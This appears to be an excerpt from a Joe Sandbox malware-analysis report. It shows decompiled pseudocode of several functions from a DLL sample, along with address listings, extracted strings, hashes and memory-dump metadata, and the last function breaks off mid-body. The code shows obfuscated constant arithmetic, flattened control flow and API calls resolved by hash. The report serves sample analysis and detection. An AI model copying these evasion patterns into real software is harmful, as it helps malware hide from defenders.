				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				intOrPtr* _t534;
				void* _t537;
				void* _t538;

				_t458 = _a24;
				_push(_t458);
				_push(_a20);
				_t534 = __ecx;
				_push(_a16);
				_v156 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t400);
				_v152 = 0x1ee029;
				_t538 = _t537 + 0x20;
				_t460 = 0xf0aa094;
				_t519 = 0x59;
				_v152 = _v152 * 0x53;
				_v152 = _v152 ^ 0x0a02ad5b;
				_v120 = 0x2e5311;
				_v120 = _v120 ^ 0xe660d2f8;
				_v120 = _v120 ^ 0xe649fc28;
				_v80 = 0x91358;
				_v80 = _v80 * 0x29;
				_v80 = _v80 | 0x1917a6d7;
				_v80 = _v80 ^ 0x197ed78c;
				_v96 = 0x864d8a;
				_v96 = _v96 * 0x68;
				_v96 = _v96 / _t519;
				_v96 = _v96 ^ 0x00977d81;
				_v104 = 0x73430f;
				_t520 = 0x22;
				_v104 = _v104 / _t520;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x01b21e30;
				_v128 = 0x2ef155;
				_t521 = 0xc;
				_v128 = _v128 / _t521;
				_v128 = _v128 ^ 0x0005732d;
				_v12 = 0x61311f;
				_t522 = 0x51;
				_v12 = _v12 / _t522;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x00018224;
				_v112 = 0x2a9ecd;
				_v112 = _v112 << 8;
				_v112 = _v112 + 0x4b18;
				_v112 = _v112 ^ 0x2a91adfb;
				_v44 = 0x8c67a3;
				_v44 = _v44 + 0xbf2c;
				_t523 = 0x1a;
				_v44 = _v44 / _t523;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x56d2d87d;
				_v20 = 0xb2272e;
				_t524 = 0x6b;
				_v20 = _v20 / _t524;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xffffd823;
				_v20 = _v20 ^ 0x003105de;
				_v144 = 0x2b3b33;
				_t525 = 0x2b;
				_v144 = _v144 * 0x23;
				_v144 = _v144 ^ 0x05e29440;
				_v52 = 0xfb7274;
				_v52 = _v52 + 0xffff2a15;
				_v52 = _v52 + 0xffff332b;
				_v52 = _v52 >> 9;
				_v52 = _v52 ^ 0x000fdf14;
				_v88 = 0xc646f0;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0xffff0542;
				_v88 = _v88 ^ 0x0060230d;
				_v136 = 0x21355;
				_v136 = _v136 + 0x6ddd;
				_v136 = _v136 ^ 0x000c09c4;
				_v148 = 0xba736e;
				_v148 = _v148 + 0xffff584e;
				_v148 = _v148 ^ 0x00bc780c;
				_v72 = 0xf06361;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0xd5eeb61d;
				_v72 = _v72 ^ 0xd5e3ba03;
				_v68 = 0x39c1e1;
				_v68 = _v68 / _t525;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x157dcab9;
				_v28 = 0x7b1c58;
				_v28 = _v28 + 0x44f9;
				_v28 = _v28 + 0xe0d1;
				_v28 = _v28 | 0x2c17f99e;
				_v28 = _v28 ^ 0x2c795b23;
				_v8 = 0x6811e0;
				_t526 = 0x7d;
				_v8 = _v8 / _t526;
				_t527 = 0x6c;
				_v8 = _v8 / _t527;
				_t528 = 6;
				_v8 = _v8 / _t528;
				_v8 = _v8 ^ 0x00012ce9;
				_v84 = 0x1c9c1b;
				_v84 = _v84 ^ 0x05ddd281;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x002853b0;
				_v76 = 0xb1555b;
				_v76 = _v76 << 7;
				_v76 = _v76 * 0x47;
				_v76 = _v76 ^ 0x9758833c;
				_v36 = 0x114b6d;
				_v36 = _v36 ^ 0x431dffba;
				_v36 = _v36 >> 3;
				_v36 = _v36 + 0x181d;
				_v36 = _v36 ^ 0x086a5704;
				_v60 = 0xa17b63;
				_v60 = _v60 ^ 0x190e6497;
				_v60 = _v60 ^ 0xa9f7cd41;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0xb1a3277b;
				_v24 = 0xc713d;
				_v24 = _v24 + 0xc399;
				_v24 = _v24 << 4;
				_v24 = _v24 + 0xfffffd24;
				_v24 = _v24 ^ 0x00d339a4;
				_v16 = 0xef5337;
				_t529 = 0x2b;
				_v16 = _v16 / _t529;
				_v16 = _v16 | 0x2bad32d2;
				_v16 = _v16 + 0xfffffea2;
				_v16 = _v16 ^ 0x2bafb8a8;
				_v100 = 0x51ad29;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x8b9fc663;
				_v100 = _v100 ^ 0xbe3a4459;
				_v92 = 0x2bdd9f;
				_t530 = 0x14;
				_v92 = _v92 / _t530;
				_v92 = _v92 + 0xffff92be;
				_v92 = _v92 ^ 0x000ebd35;
				_v140 = 0x9e48cc;
				_v140 = _v140 << 0xd;
				_v140 = _v140 ^ 0xc915160c;
				_v108 = 0xd84d8a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x0004338e;
				_v40 = 0xc226eb;
				_v40 = _v40 << 2;
				_v40 = _v40 + 0xfffff267;
				_v40 = _v40 << 0x10;
				_v40 = _v40 ^ 0x8e1c4dbd;
				_v32 = 0xa8fcf7;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 / _t530;
				_t531 = 0x59;
				_v32 = _v32 * 0x62;
				_v32 = _v32 ^ 0x9808cd5a;
				_v56 = 0xfa54e1;
				_v56 = _v56 + 0xffff7ead;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t531;
				_v56 = _v56 ^ 0x00b2c623;
				_v132 = 0x7ed953;
				_v132 = _v132 ^ 0x188046ff;
				_v132 = _v132 ^ 0x18f64c45;
				_v124 = 0x5f3094;
				_v124 = _v124 ^ 0xdd2f4899;
				_v124 = _v124 ^ 0xdd733dae;
				_v48 = 0x3fdd04;
				_v48 = _v48 + 0xdca9;
				_v48 = _v48 ^ 0x51a2bdec;
				_v48 = _v48 + 0xffffe9fd;
				_v48 = _v48 ^ 0x51eeddfc;
				_v116 = 0x86a662;
				_t532 = 0x3e;
				_t533 = _v156;
				_v116 = _v116 / _t532;
				_v116 = _v116 * 0x73;
				_v116 = _v116 ^ 0x00fd398d;
				_v64 = 0x72f53e;
				_v64 = _v64 + 0x31db;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0xffff6dcd;
				_v64 = _v64 ^ 0x0003149a;
				while(1) {
					_t508 = 0x2e;
					L2:
					while(_t460 != 0x9b6cb5) {
						if(_t460 == 0x44804ea) {
							__eflags = _v820 & _v152;
							if(__eflags == 0) {
								_t445 =  *_t534( &_v820,  &_v228);
								asm("sbb ecx, ecx");
								_t460 = ( ~_t445 & 0xfb5d1634) + 0x53e5681;
								while(1) {
									_t508 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v776 - _t508;
							if(_v776 != _t508) {
								L18:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v28);
									_push(_v68);
									_push(_v72);
									E00882D0A(_v84, __eflags,  &_v776, _v76, _v36, _v60, E008616DC,  &_v1860, _t458, E0087E1F8(E008616DC, _v148, __eflags));
									E0087437A(_v156, _v24, _v16, _v100, _v92, _a16, _a20,  &_v1860);
									_t447 = E0087FECB(_t452, _v140, _v108, _v40, _v32);
									_t534 = _v156;
									_t538 = _t538 + 0x50;
									_t508 = 0x2e;
								}
								L17:
								_t460 = 0x9b6cb5;
								continue;
							}
							__eflags = _v774;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v774 - _t508;
							if(_v774 != _t508) {
								goto L18;
							}
							__eflags = _v772;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t460 == 0x481089e) {
							_t447 = E00872DA7( &_v820, _v88, _v136,  &_v1340);
							_t533 = _t447;
							__eflags = _t447 - 0xffffffff;
							if(__eflags == 0) {
								return _t447;
							}
							_t460 = 0x44804ea;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 == 0x53e5681) {
							return E0086BEA1(_v116, _v64, _t533);
						}
						if(_t460 == 0xeb5715f) {
							_push(_v104);
							_push(_v96);
							_push(_v80);
							E00872C9C(_v12, __eflags, E0087E1F8(0x86167c, _v120, __eflags),  &_v1340, 0x86167c, _v112, _t458);
							_t447 = E0087FECB(_t449, _v44, _v20, _v144, _v52);
							_t534 = _v156;
							_t538 = _t538 + 0x2c;
							_t460 = 0x481089e;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 != 0xf0aa094) {
							L24:
							__eflags = _t460 - 0x41075ad;
							if(__eflags != 0) {
								continue;
							}
							return _t447;
						}
						_v168 = _t458;
						_t460 = 0xeb5715f;
					}
					_t441 = E00880F1E(_v56, _v132,  &_v820, _v124, _v48, _t533);
					_t538 = _t538 + 0x10;
					__eflags = _t441;
					if(__eflags != 0) {
						_t460 = 0x44804ea;
						_t508 = 0x2e;
						goto L24;
					}
					_t460 = 0x53e5681;
				}
			}

0x00874384
0x00874389
0x0087438a
0x0087438d
0x0087438f
0x00874392
0x00874398
0x0087439b
0x0087439e
0x008743a1
0x008743a2
0x008743a3
0x008743a8
0x008743b2
0x008743be
0x008743c5
0x008743c6
0x008743cc
0x008743d6
0x008743dd
0x008743e4
0x008743eb
0x008743f8
0x008743fb
0x00874402
0x00874409
0x00874414
0x0087441e
0x00874421
0x00874428
0x00874432
0x00874437
0x0087443c
0x00874440
0x00874447
0x00874451
0x00874456
0x0087445b
0x00874462
0x0087446c
0x00874471
0x00874476
0x0087447a
0x0087447e
0x00874485
0x0087448c
0x00874490
0x00874497
0x0087449e
0x008744a5
0x008744af
0x008744b2
0x008744b5
0x008744b9
0x008744c0
0x008744ce
0x008744d3
0x008744d8
0x008744dc
0x008744e3
0x008744ea
0x008744fb
0x008744fe
0x00874504
0x0087450e
0x00874515
0x0087451c
0x00874523
0x00874527
0x0087452e
0x00874535
0x00874538
0x0087453f
0x00874546
0x00874550
0x0087455a
0x00874564
0x0087456e
0x00874578
0x00874582
0x00874589
0x0087458d
0x00874594
0x0087459b
0x008745a9
0x008745ac
0x008745b0
0x008745b7
0x008745be
0x008745c5
0x008745cc
0x008745d3
0x008745da
0x008745e4
0x008745e9
0x008745f1
0x008745f6
0x008745fe
0x00874601
0x00874604
0x0087460b
0x00874612
0x00874619
0x0087461d
0x00874624
0x0087462b
0x00874633
0x00874636
0x0087463d
0x00874644
0x0087464b
0x0087464f
0x00874656
0x0087465d
0x00874664
0x0087466d
0x00874674
0x00874678
0x0087467f
0x00874686
0x0087468d
0x00874691
0x00874698
0x0087469f
0x008746ab
0x008746b0
0x008746b3
0x008746ba
0x008746c1
0x008746c8
0x008746cf
0x008746d3
0x008746da
0x008746e1
0x008746ed
0x008746f2
0x008746f5
0x008746fc
0x00874703
0x0087470d
0x00874714
0x0087471e
0x00874725
0x00874729
0x0087472d
0x00874734
0x0087473b
0x0087473f
0x00874746
0x0087474a
0x00874751
0x0087475e
0x00874768
0x0087476f
0x00874772
0x00874775
0x0087477c
0x00874783
0x0087478a
0x00874795
0x00874798
0x0087479f
0x008747a6
0x008747ad
0x008747b4
0x008747bb
0x008747c2
0x008747c9
0x008747d0
0x008747d7
0x008747de
0x008747e5
0x008747ec
0x008747f6
0x008747f9
0x008747ff
0x00874806
0x00874809
0x00874810
0x00874817
0x0087481e
0x00874822
0x00874829
0x00874830
0x00874832
0x00000000
0x00874833
0x00874845
0x0087491b
0x00874921
0x008749f9
0x008749ff
0x00874a07
0x00874830
0x00874832
0x00000000
0x00874832
0x00874830
0x00874927
0x0087492e
0x00874957
0x00874957
0x0087495b
0x0087495d
0x00874965
0x00874968
0x0087499b
0x008749bf
0x008749d5
0x008749da
0x008749e0
0x008749e5
0x008749e5
0x0087494d
0x0087494d
0x00000000
0x0087494d
0x00874930
0x00874938
0x00000000
0x00000000
0x0087493a
0x00874941
0x00000000
0x00000000
0x00874943
0x0087494b
0x00000000
0x00000000
0x00000000
0x0087494b
0x00874851
0x008748f9
0x008748fe
0x00874902
0x00874905
0x00874a65
0x00874a65
0x0087490b
0x00874830
0x00874832
0x00000000
0x00874832
0x00874830
0x0087485d
0x00000000
0x00874a5e
0x00874869
0x00874884
0x0087488c
0x0087488f
0x008748b2
0x008748cb
0x008748d0
0x008748d6
0x008748d9
0x00874830
0x00874832
0x00000000
0x00874832
0x00874830
0x00874871
0x00874a44
0x00874a44
0x00874a4a
0x00000000
0x00000000
0x00000000
0x00874a4a
0x00874877
0x0087487d
0x0087487d
0x00874a26
0x00874a2b
0x00874a2e
0x00874a30
0x00874a3e
0x00874a43
0x00000000
0x00874a43
0x00874a32
0x00874a32

Strings

#`, xrefs: 0087453F
#[y,, xrefs: 008745D3
3;+, xrefs: 008744EA
7S, xrefs: 0087469F

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #`$#[y,$3;+$7S
API String ID: 0-3740457175
Opcode ID: f52ff9c816c97f13908c0582980fbc59111cf20648b5ed5f4601341eb8a63aee
Instruction ID: a739328f99e6e4ef1012d50ec159c642787fa90362eefc6725565aeb03c684b1
Opcode Fuzzy Hash: f52ff9c816c97f13908c0582980fbc59111cf20648b5ed5f4601341eb8a63aee
Instruction Fuzzy Hash: E6124571D0021CDBDF28CFA5C989ADEBBB2FB44314F248159E11ABB264D7B04A96CF40

Uniqueness

Uniqueness Score: -1.00%

Function 008800EF, Relevance: 5.3, Strings: 4, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E008800EF(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				unsigned int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t303;
				void* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t370;
				signed int* _t373;

				_t373 =  &_v1692;
				_v1576 = 0xe8da59;
				asm("stosd");
				_t316 = __ecx;
				_t318 = 0x5a;
				asm("stosd");
				_t370 = 0x219adc7;
				asm("stosd");
				_v1592 = 0x4cba20;
				_v1592 = _v1592 / _t318;
				_v1592 = _v1592 ^ 0x000e53d2;
				_v1660 = 0x37da44;
				_v1660 = _v1660 | 0x897b84ec;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x011e0d16;
				_v1628 = 0x1c89a1;
				_v1628 = _v1628 | 0x8af6c41c;
				_v1628 = _v1628 ^ 0x8af282b8;
				_v1684 = 0xdb2dca;
				_v1684 = _v1684 | 0x5a04171c;
				_t319 = 0xb;
				_v1684 = _v1684 * 0x1a;
				_v1684 = _v1684 >> 0xb;
				_v1684 = _v1684 ^ 0x000c87cc;
				_v1676 = 0x832ed6;
				_v1676 = _v1676 / _t319;
				_t320 = 5;
				_v1676 = _v1676 / _t320;
				_v1676 = _v1676 ^ 0xed35e4ac;
				_v1676 = _v1676 ^ 0xed379c5b;
				_v1616 = 0xcbfb93;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x000d5997;
				_v1688 = 0xe655f9;
				_v1688 = _v1688 + 0xffff9882;
				_t321 = 0x2b;
				_v1688 = _v1688 * 0xb;
				_v1688 = _v1688 * 0x5b;
				_v1688 = _v1688 ^ 0x83159ef1;
				_v1692 = 0xaa6b82;
				_v1692 = _v1692 | 0xcfd3fae0;
				_v1692 = _v1692 / _t321;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x4e1b8b3c;
				_v1644 = 0x70af24;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 | 0xf364d4b3;
				_v1644 = _v1644 ^ 0xff7a96be;
				_v1668 = 0x4a582b;
				_v1668 = _v1668 * 0x66;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0x909bc222;
				_v1636 = 0x31215f;
				_v1636 = _v1636 ^ 0x6923b039;
				_t322 = 0x29;
				_v1636 = _v1636 / _t322;
				_v1636 = _v1636 ^ 0x029cf3aa;
				_v1652 = 0x9b2524;
				_t323 = 0x38;
				_v1652 = _v1652 / _t323;
				_v1652 = _v1652 ^ 0x48c3dfd8;
				_v1652 = _v1652 ^ 0x48c1ce16;
				_v1608 = 0x82759;
				_v1608 = _v1608 >> 9;
				_v1608 = _v1608 ^ 0x000ff1e7;
				_v1580 = 0x9cb9ac;
				_v1580 = _v1580 + 0xffffe541;
				_v1580 = _v1580 ^ 0x0099fe2e;
				_v1648 = 0xf0b12f;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 >> 0xc;
				_v1648 = _v1648 ^ 0x000b1180;
				_v1680 = 0x5a67b4;
				_t324 = 0x1f;
				_v1680 = _v1680 / _t324;
				_t325 = 0x30;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 / _t325;
				_v1680 = _v1680 ^ 0x000c0a94;
				_v1656 = 0x7af90a;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 ^ 0xd48e11dc;
				_v1656 = _v1656 ^ 0xd48f85db;
				_v1664 = 0xc7c49c;
				_v1664 = _v1664 ^ 0x0b3147da;
				_v1664 = _v1664 ^ 0x91b20725;
				_v1664 = _v1664 ^ 0x9a45c1a7;
				_v1584 = 0x3444f6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x00d71217;
				_v1624 = 0x130de1;
				_t326 = 0x58;
				_v1624 = _v1624 / _t326;
				_v1624 = _v1624 ^ 0x000fc6c7;
				_v1588 = 0xc870d9;
				_v1588 = _v1588 >> 7;
				_v1588 = _v1588 ^ 0x00060dd4;
				_v1600 = 0xa62b50;
				_v1600 = _v1600 | 0x0b3ea590;
				_v1600 = _v1600 ^ 0x0bb32963;
				_v1640 = 0x5829fa;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 * 7;
				_v1640 = _v1640 ^ 0x000c8c8e;
				_v1620 = 0x9954e5;
				_v1620 = _v1620 | 0x46050794;
				_v1620 = _v1620 ^ 0x46999c00;
				_v1672 = 0x8b6b4f;
				_v1672 = _v1672 ^ 0x051743d3;
				_v1672 = _v1672 + 0x5fbf;
				_v1672 = _v1672 * 0x44;
				_v1672 = _v1672 ^ 0x7d983568;
				_v1596 = 0x4b105f;
				_v1596 = _v1596 ^ 0x074c3e20;
				_v1596 = _v1596 ^ 0x0709a291;
				_v1632 = 0x867cf1;
				_v1632 = _v1632 + 0x5758;
				_v1632 = _v1632 << 0xb;
				_v1632 = _v1632 ^ 0x36a3bfa7;
				_v1604 = 0x1e01e;
				_t327 = 0x6d;
				_v1604 = _v1604 / _t327;
				_v1604 = _v1604 ^ 0x000451f9;
				_v1612 = 0x51328f;
				_t328 = 0x66;
				_t303 = _v1612 / _t328;
				_v1612 = _t303;
				_v1612 = _v1612 ^ 0x000ccfe8;
				while(_t370 != 0x219adc7) {
					if(_t370 == 0x472b880) {
						_push(_t328);
						__eflags = 0;
						return E008785FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
					}
					_t379 = _t370 - 0x6430241;
					if(_t370 != 0x6430241) {
						L7:
						__eflags = _t370 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t303;
						}
						L10:
						return _t303;
					}
					E00880DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
					 *((short*)(E008709DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
					E0086BAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
					_push(_v1580);
					_push(_v1608);
					_push(_v1652);
					E00882D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x8618bc,  &_v1560,  &_v1040, E0087E1F8(0x8618bc, _v1636, _t379));
					E0087FECB(_t310, _v1624, _v1588, _v1600, _v1640);
					_t328 = _v1620;
					_t303 = E0086BFBE( &_v1560, _t316, _v1672);
					_t373 =  &(_t373[0x18]);
					if(_t303 != 0) {
						_t370 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t370 = 0x6430241;
				goto L7;
			}

0x008800ef
0x008800f5
0x0088010c
0x0088010d
0x00880111
0x00880114
0x00880115
0x0088011a
0x0088011b
0x0088012b
0x0088012f
0x00880137
0x0088013f
0x00880147
0x0088014c
0x00880154
0x0088015c
0x00880164
0x0088016c
0x00880174
0x00880181
0x00880184
0x00880188
0x0088018d
0x00880195
0x008801a5
0x008801ad
0x008801b2
0x008801b8
0x008801c0
0x008801c8
0x008801d0
0x008801d5
0x008801dd
0x008801e5
0x008801f2
0x008801f3
0x008801fc
0x00880200
0x00880208
0x00880210
0x0088021e
0x00880227
0x0088022b
0x00880233
0x0088023b
0x00880240
0x00880248
0x00880250
0x0088025d
0x00880261
0x00880266
0x0088026e
0x00880276
0x00880286
0x0088028b
0x00880291
0x00880299
0x008802a5
0x008802aa
0x008802b0
0x008802b8
0x008802c0
0x008802c8
0x008802cd
0x008802d5
0x008802e0
0x008802eb
0x008802f6
0x008802fe
0x00880303
0x00880308
0x00880310
0x0088031c
0x00880321
0x0088032c
0x0088032f
0x0088033b
0x0088033f
0x00880347
0x0088034f
0x00880354
0x0088035c
0x00880364
0x0088036c
0x00880374
0x0088037c
0x00880384
0x0088038f
0x00880397
0x008803a2
0x008803ae
0x008803b1
0x008803b5
0x008803bd
0x008803c5
0x008803ca
0x008803d2
0x008803da
0x008803e2
0x008803ea
0x008803f2
0x008803fc
0x00880400
0x00880408
0x00880410
0x00880418
0x00880420
0x00880428
0x00880430
0x0088043d
0x00880441
0x00880449
0x00880451
0x0088045b
0x00880468
0x00880475
0x0088047d
0x00880482
0x0088048a
0x00880498
0x0088049d
0x008804a3
0x008804ab
0x008804b7
0x008804b8
0x008804ba
0x008804be
0x008804c6
0x008804d4
0x008805e9
0x008805ee
0x00000000
0x0088060f
0x008804da
0x008804dc
0x008805db
0x008805db
0x008805e1
0x00000000
0x00000000
0x00000000
0x00000000
0x0088061c
0x0088061c
0x0088061c
0x008804f9
0x00880518
0x00880533
0x00880538
0x00880544
0x0088054b
0x0088058e
0x008805ae
0x008805b7
0x008805c6
0x008805cb
0x008805d0
0x008805d2
0x00000000
0x008805d2
0x00000000
0x008805d0
0x008805d9
0x00000000

Strings

_!1, xrefs: 0088026E
+XJ, xrefs: 00880250
XW, xrefs: 00880475
$P, xrefs: 00880101

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: c7104682ceaf1b92b16efb9e87ae971e6b9087ab15bce6fa971f4d743f6a9d42
Instruction ID: 48394b16ea691945f4620ae42886f80d4f114cc758353201606be7f4f8142e91
Opcode Fuzzy Hash: c7104682ceaf1b92b16efb9e87ae971e6b9087ab15bce6fa971f4d743f6a9d42
Instruction Fuzzy Hash: 22D1F1715093809FD368CF65C98AA5BBBF2FBC4748F108A1DF5999A260D7B19908CF43

Uniqueness

Uniqueness Score: -1.00%

Function 008680C0, Relevance: 5.3, Strings: 4, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E008680C0(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				void* _t254;
				void* _t262;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				void* _t301;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t318;
				signed int* _t319;

				_t276 = __ecx;
				_t319 =  &_v224;
				_v180 = 0xc71c90;
				_v180 = _v180 * 0x55;
				_t315 = 0xb85ea37;
				_v180 = _v180 + 0xffff2ba7;
				_v180 = _v180 ^ 0x4211e203;
				_v140 = 0x3ad325;
				_v140 = _v140 ^ 0x295262d9;
				_v140 = _v140 ^ 0x29635001;
				_v136 = 0xed3dcc;
				_t307 = 0x6e;
				_v172 = __ecx;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0x3c3e3c90;
				_v168 = 0x802272;
				_v168 = _v168 + 0x3a4b;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0009cc0d;
				_v144 = 0x950525;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x0000417f;
				_v132 = 0xde9c46;
				_v132 = _v132 | 0x6a28fd38;
				_v132 = _v132 ^ 0x6afd2d29;
				_v152 = 0x89fdc2;
				_v152 = _v152 + 0xffff27d1;
				_v152 = _v152 / _t307;
				_v152 = _v152 ^ 0x00002723;
				_v208 = 0xb8ba68;
				_t308 = 0x59;
				_v208 = _v208 / _t308;
				_v208 = _v208 | 0x82dd863f;
				_t309 = 0x24;
				_v208 = _v208 / _t309;
				_v208 = _v208 ^ 0x03ab2b52;
				_v200 = 0x881ce0;
				_t310 = 0x22;
				_v200 = _v200 / _t310;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0x7e14;
				_v200 = _v200 ^ 0x000ee7c7;
				_v216 = 0xe9a9fc;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 * 0x7c;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x000159fc;
				_v148 = 0xc6b5e0;
				_v148 = _v148 >> 8;
				_v148 = _v148 ^ 0x0008baff;
				_v192 = 0x70df9a;
				_v192 = _v192 | 0xc7ad4485;
				_v192 = _v192 << 0xe;
				_v192 = _v192 * 0x6c;
				_v192 = _v192 ^ 0x95ca127f;
				_v164 = 0x9f9928;
				_v164 = _v164 + 0x9182;
				_v164 = _v164 | 0x4431d27d;
				_v164 = _v164 ^ 0x44b31704;
				_v156 = 0x8a7155;
				_v156 = _v156 ^ 0x4b85dc4d;
				_v156 = _v156 << 3;
				_v156 = _v156 ^ 0x587c4d22;
				_v184 = 0xc4c18b;
				_v184 = _v184 ^ 0x011789e6;
				_v184 = _v184 | 0x4a7cbaeb;
				_v184 = _v184 ^ 0x4bf1fe8b;
				_v160 = 0x793715;
				_v160 = _v160 | 0xbf52a4ae;
				_v160 = _v160 ^ 0x0f7ea677;
				_v160 = _v160 ^ 0xb008de62;
				_v212 = 0x3fdf0f;
				_v212 = _v212 + 0xffffd1fd;
				_t311 = 7;
				_t318 = _v172;
				_v212 = _v212 * 0x1c;
				_v212 = _v212 >> 5;
				_v212 = _v212 ^ 0x0033b954;
				_v220 = 0x4e6c7b;
				_v220 = _v220 >> 4;
				_t275 = _v172;
				_v220 = _v220 / _t311;
				_v220 = _v220 + 0x72d0;
				_v220 = _v220 ^ 0x000bd6ae;
				_v176 = 0xb64387;
				_v176 = _v176 + 0xffff3763;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000cc814;
				_v224 = 0xc05028;
				_v224 = _v224 + 0xffff6137;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x7bfc229c;
				_v224 = _v224 ^ 0x7ba9fc4e;
				_v188 = 0xb7ebf2;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x513bd66b;
				_t312 = 0x35;
				_v188 = _v188 * 0x6b;
				_v188 = _v188 ^ 0xf3ed84ff;
				_v196 = 0x918e67;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 / _t312;
				_t313 = 0x12;
				_t314 = _v172;
				_v196 = _v196 / _t313;
				_v196 = _v196 ^ 0x000cd5f1;
				_v204 = 0xbd465b;
				_v204 = _v204 ^ 0x40a0ad4b;
				_v204 = _v204 * 0x5a;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x022df88e;
				while(1) {
					L1:
					_t254 = 0x58c5d57;
					do {
						while(_t315 != 0x26b32e) {
							if(_t315 == _t254) {
								_push(_v160);
								_push(_v184);
								_push(_v156);
								_t262 = E0087E1F8(0x861738, _v164, __eflags);
								_push(_t314);
								_push( &_v128);
								_push(_t262);
								_push(_t318);
								_push(_t275);
								 *((intOrPtr*)(E008831AA(0xb00b1257, 0x44)))();
								E0087FECB(_t262, _v212, _v220, _v176, _v224);
